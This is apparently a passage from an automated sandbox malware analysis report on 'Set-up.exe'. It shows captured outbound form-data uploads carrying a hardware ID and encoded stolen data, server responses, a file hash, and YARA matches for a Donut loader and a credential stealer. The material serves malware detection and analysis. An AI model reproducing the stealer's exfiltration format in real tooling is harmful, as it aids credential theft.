    Data Ascii: --QNDAGIMEContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--QNDAGIMEContent-Disposition: form-data; name="pid"1--QNDAGIMEContent-Disposition: form-data; name="lid"hRjzG3--DRON--QNDAGIMEContent-Dispositi
2025-01-05 17:53:46 UTC  15331              OUT        Data Raw: (hex dump of non-printable binary payload omitted)
2025-01-05 17:53:46 UTC  15331              OUT        Data Raw: (hex dump of non-printable binary payload omitted)
2025-01-05 17:53:46 UTC  15331              OUT        Data Raw: (hex dump of non-printable binary payload omitted)
2025-01-05 17:53:46 UTC  15331              OUT        Data Raw: (hex dump of non-printable binary payload omitted)
                                                                                                                      Data Ascii: f%]JRiR)Om+T5Fm]Gp8Ru:oPrffKsp=5b/5X9KWt@F]wiw}0j9oT82g>:*^y%A`3BweiZl+Q8y0:VJHEl^j#>7u;kT+9{Vf
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 36 77 99 bb 06 07 9f d0 b2 84 34 2d 49 10 94 3f 97 fb df 3a bb 7e bb 66 5e e1 32 b8 e3 f7 8c cf 77 64 1c e6 8f f4 bf 33 13 05 00 e0 08 03 8d 44 28 14 30 d7 a7 a6 1e 8c a4 9d 87 f3 c3 eb b0 27 94 1b 9d b7 7b 20 ae 7a ff 61 03 b0 86 cd 53 e0 d5 1f 23 37 87 28 02 e0 d5 52 1b 92 ae c0 a2 a7 84 fe 2a 3d 60 80 9d 0a d0 40 42 bc 88 43 08 13 2a fd 1e 93 7b 9a 10 13 59 ed fb a5 55 e0 85 be b7 e4 cd 96 91 bf 6f d8 b1 aa 3a 0e 39 0a 0b d7 3f d7 bb 55 7a fd 0d 44 1e df b8 bc 47 06 68 df 1c 9a f8 07 b3 f1 15 62 94 55 1f c3 31 04 c7 74 30 42 d0 42 a3 50 af e4 4f 59 7a e3 9e 4b 67 72 b1 be 85 05 35 04 fe 39 38 3e b1 4c 47 34 bc be 0d b6 cb 46 e5 21 b2 fa e2 41 6c e7 5f c9 c9 5f 41 76 20 78 63 4a 2a 1a 78 c5 38 0b c8 79 f8 2b a9 02 f4 f6 d0 cf fa e0 5d a3 f1 8e 53 36 1f
                                                                                                                      Data Ascii: 6w4-I?:~f^2wd3D(0'{ zaS#7(R*=`@BC*{YUo:9?UzDGhbU1t0BBPOYzKgr598>LG4F!Al__Av xcJ*x8y+]S6
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: ee b8 cf da be 16 33 15 c9 4d 40 ad c8 7d 29 db cd 86 83 a0 4e 2d a6 54 bf 80 f7 24 d7 6f 4f 31 36 a4 75 fe 0b 5d 90 91 54 cc c5 a2 14 ed 78 10 07 25 eb 6b 1f 42 64 76 01 db 25 75 cb 03 62 18 18 7f 36 dc de 94 50 69 f5 5c 1c fe 2c 90 c6 fa ed ca fa fd 4f 5d cd b3 08 ee 66 ce f6 24 47 e9 8d 6b 8d 22 c7 2c 98 a5 b0 70 64 63 8f 35 db 3c 7e 31 9c d5 96 b8 a3 1e 43 51 1f 62 50 19 84 f1 c6 bf df be f8 f5 c2 86 6e f7 0a d6 7d e6 35 ee 32 b2 ff 94 ba d1 ea 0c 7d 99 f5 cf 6e a9 01 aa 2a 43 07 3b d5 c3 03 6a 96 bf ff f4 bc 79 29 c4 d2 8a 50 14 b7 59 81 89 9a 7f a3 7a fa fe 89 3b f3 4e 7d 9e 7e b9 3d 4f 5b 04 02 e8 be 37 95 02 f1 da e2 b2 6b 4a 7b 51 f8 e8 d5 c2 47 15 a8 ec 2b 41 8c d1 63 6a 61 bd df 05 bd d5 fe 98 e4 51 3b ed 5e 77 50 c4 4f 0b 79 8e f0 e1 88 aa e8
                                                                                                                      Data Ascii: 3M@})N-T$oO16u]Tx%kBdv%ub6Pi\,O]f$Gk",pdc5<~1CQbPn}52}n*C;jy)PYz;N}~=O[7kJ{QG+AcjaQ;^wPOy
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 5b 99 3b 34 39 a7 c3 dc 3d fc 6d f5 28 3f 67 c8 64 e6 58 fd 4d 76 35 29 58 f0 dd 76 90 2e a1 0e 1d 6b 02 e0 a8 0e 98 ee dc 59 11 07 91 9c 63 5e 7b b0 7a de 4c 02 b4 8c a8 d0 6a ee df a7 3d 10 35 0d ff ce dd a7 92 5a 20 e1 ba f5 c5 23 d7 1a 64 bc 4c ef 6f 91 68 11 ab 6f 66 8a 8b 53 44 56 8e 67 17 f6 55 36 3c 2f 2c fe 69 8d 60 4a a3 32 3e 37 b0 fe 13 82 87 a3 e1 13 a2 c0 8e fd 01 12 3c a9 a8 d2 03 48 d0 29 05 9a 4d 7b ed 36 27 49 46 42 54 72 8b 05 60 be ba 3f 18 f4 b5 ae 12 a6 48 27 04 20 e0 44 ce 8b 27 35 3e dc ab 18 be 8f b4 d3 18 32 e8 f6 c6 59 90 ae 89 bb 8c 81 84 81 0c 4f 03 68 e9 af 3f c4 32 dc 1c 0f c0 c3 fa 43 4c 2f 89 c7 95 65 92 40 88 e9 28 4d 67 a2 9b f4 11 4c 06 6f 0d 73 f6 12 fb f2 5e c6 7e de 39 f2 e6 c9 f5 3c 70 ac 87 3e c1 f3 4e f8 91 a2 cd
                                                                                                                      Data Ascii: [;49=m(?gdXMv5)Xv.kYc^{zLj=5Z #dLohofSDVgU6</,i`J2>7<H)M{6'IFBTr`?H' D'5>2YOh?2CL/e@(MgLos^~9<p>N
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 29 c4 85 76 b9 6c bc 9f 7b 19 64 b4 2b d5 06 1d f6 b2 49 77 8c 3b 98 91 6a 9f 19 b9 5f b6 d9 56 ef 49 f5 53 4c bf 92 0a 1c 00 1d fc eb 1f dd 28 62 b6 ea 30 f3 2c e2 ef 2b 98 e4 79 46 3a 3b 97 85 f7 f6 81 7e ad 16 26 21 eb d0 d8 ec 5c e0 e0 1c d5 85 68 7e 40 9f 14 aa 97 70 68 43 50 94 17 4c 73 88 29 89 0a af bf 10 e6 46 45 29 c6 7c e9 d5 b7 7f c9 5f a3 34 dc 86 b0 c2 42 31 27 1c 86 aa 5e 3e c1 b7 f0 ea 94 29 6e 45 46 f2 1d e7 c3 7a 65 a8 aa cc ac 83 61 46 fc d6 16 f0 8c b1 a3 e7 ed c4 f8 70 78 f5 c9 1f ba 51 a4 0e 16 2a 96 f1 62 89 8b 05 c5 32 a5 c2 eb 67 2d a8 aa e8 6b 08 4a f3 8a c0 33 49 ae 6a 90 50 dc ba b7 2b 13 f4 82 00 01 ee 3b 6d 41 b9 1f db ce 6a da 45 22 3d 82 f5 71 cd ab da 4c 55 35 95 9c ac ab 63 3f 65 dd 5b 96 d4 e5 db c3 82 fa b3 f6 03 ef 07
                                                                                                                      Data Ascii: )vl{d+Iw;j_VISL(b0,+yF:;~&!\h~@phCPLs)FE)|_4B1'^>)nEFzeaFpxQ*b2g-kJ3IjP+;mAjE"=qLU5c?e[
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 49 9b 30 24 cc d1 02 f5 a1 33 c3 d5 cd 10 15 87 48 c6 f0 5c df cd 4f b5 7c 5d 98 f7 1d e4 0f f5 2e 0e f8 79 86 cf f5 ae 56 ed 3d ad 15 34 fb 99 ec 37 8b a1 0f 99 73 62 b2 4e 35 d2 e9 7e af fc d9 dc bb fe 6c 9e c1 d8 ac 2e 85 a5 4e fc 4f 6d 60 2f f1 0b 7a 9c ed 03 f1 69 62 94 71 88 d5 6d 43 9e 32 9f ff 50 58 fa 3b d8 7d 5c fc e3 c4 fa 1b 14 70 1b 1e 1c 60 5f 07 f2 a4 ec ea c8 99 c6 d9 0d 47 fa 50 7f 38 ab 9d 85 40 81 70 ff e5 85 6b 1b 11 ee b7 81 5e 29 10 14 04 ee c3 9e 93 08 78 60 a7 0b 3c f0 07 cc 1f 16 b8 85 c7 55 57 6b 1d 0b e7 24 40 64 b9 0c 58 21 f0 fb 76 ce 0a 82 7e d4 6a cc 52 ca fc dc 03 cf c7 7e f6 66 cb f7 9c 2b 6f 14 97 37 59 31 23 9d 13 3f 5c 04 86 67 08 b4 27 80 75 3f 1a 76 de 05 32 f6 38 fc ef b8 58 e7 36 30 2d 8b 10 04 4e 4e 8f 25 4a 5f 9e
                                                                                                                      Data Ascii: I0$3H\O|].yV=47sbN5~l.NOm`/zibqmC2PX;}\p`_GP8@pk^)x`<UWk$@dX!v~jR~f+o7Y1#?\g'u?v28X60-NN%J_
                                                                                                                      2025-01-05 17:53:48 UTC1135INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=eibmb7d5rbio63kvlnrr0t0idn; expires=Thu, 01 May 2025 11:40:27 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kX8Z5zVOkehl%2BkZTLDExrIRDG9e7YvQ5K5pBITSgyDypBb0g68VNcxhQyFm5v6IgL49RKwBVQCwB2pUl3KOHgsUX0Zsh%2Blb80zLTFcCqtqZiSBciS58uAhIgOXan394uPWCR3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd5546c9bce42b9-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1574&rtt_var=599&sent=197&recv=589&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574992&delivery_rate=1813664&cwnd=184&unsent_bytes=0&cid=4650188c87fad42e&ts=1660&x=0"

                                                                                                                      [Chart: x-axis 0-100 s, y-axis 0-100]

                                                                                                                      [Chart: x-axis 0-100 s, y-axis 0-80 MB]

                                                                                                                      [Process behavior distribution: File, Registry]

                                                                                                                      Target ID:0
                                                                                                                      Start time:12:53:14
                                                                                                                      Start date:05/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\'Set-up.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:76'577'172 bytes
                                                                                                                      MD5 hash:762266932C784BB2723293AD1CBECC37
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Non-executed Functions

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Offset: 00945000, based on PE: false
                                                                                                                      • Associated: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_92c000_'Set-up.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9af9bc40153e32a143e535ee7ae338e75d6f379bb1b3743e30144ea136e1d620
                                                                                                                      • Instruction ID: c4f63575dffd5f1271da4f267000e8d98f3cd8f62f292b54cb1c9d2778568cee
                                                                                                                      • Opcode Fuzzy Hash: 9af9bc40153e32a143e535ee7ae338e75d6f379bb1b3743e30144ea136e1d620
                                                                                                                      • Instruction Fuzzy Hash: 81B1EB5145E3C21FDB578B748CA9892BF706E2321431E86CFC8C68F8A3D259954AD7A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Offset: 00945000, based on PE: false
                                                                                                                      • Associated: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_92c000_'Set-up.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: aa0503fa4a6dab11e9cb2fe833cac379ee35d63a66b86b13dc7d0c629941e7e2
                                                                                                                      • Instruction ID: b2b7ceb65d6fade5b4b6709b0ed5b77107cf4b3db84cc36f15502ccffc44ece0
                                                                                                                      • Opcode Fuzzy Hash: aa0503fa4a6dab11e9cb2fe833cac379ee35d63a66b86b13dc7d0c629941e7e2
                                                                                                                      • Instruction Fuzzy Hash: B0A10C5145E3C21FDB578B748CA9892BF70BE2321431E86CFC8C68F9A3D249954AD763